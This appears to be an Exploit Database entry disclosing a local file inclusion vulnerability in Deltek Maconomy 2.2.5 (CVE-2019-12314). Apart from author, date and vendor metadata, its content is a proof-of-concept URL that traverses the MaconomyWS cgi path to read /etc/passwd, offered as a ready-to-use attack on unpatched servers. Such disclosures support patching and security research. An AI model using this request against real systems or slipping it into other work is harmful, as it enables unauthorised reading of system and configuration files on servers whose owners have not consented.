Deltek Maconomy 2.2.5 - Local File Inclusion

Author: JameelNabbo
type: webapps
platform: multiple
port: 
date_added: 2019-05-27  
date_updated: 2019-05-27  
verified: 0  
codes: CVE-2019-12314  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 46931.txt  

# Exploit Title: Maconomy Erp local file include
# Date: 22/05/2019
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com
# Vendor Homepage: https://www.deltek.com
# Software Link: https://www.deltek.com/en-gb/products/project-erp/maconomy
# CVE: CVE-2019-12314
POC:

POC:
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//LFI
Example
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd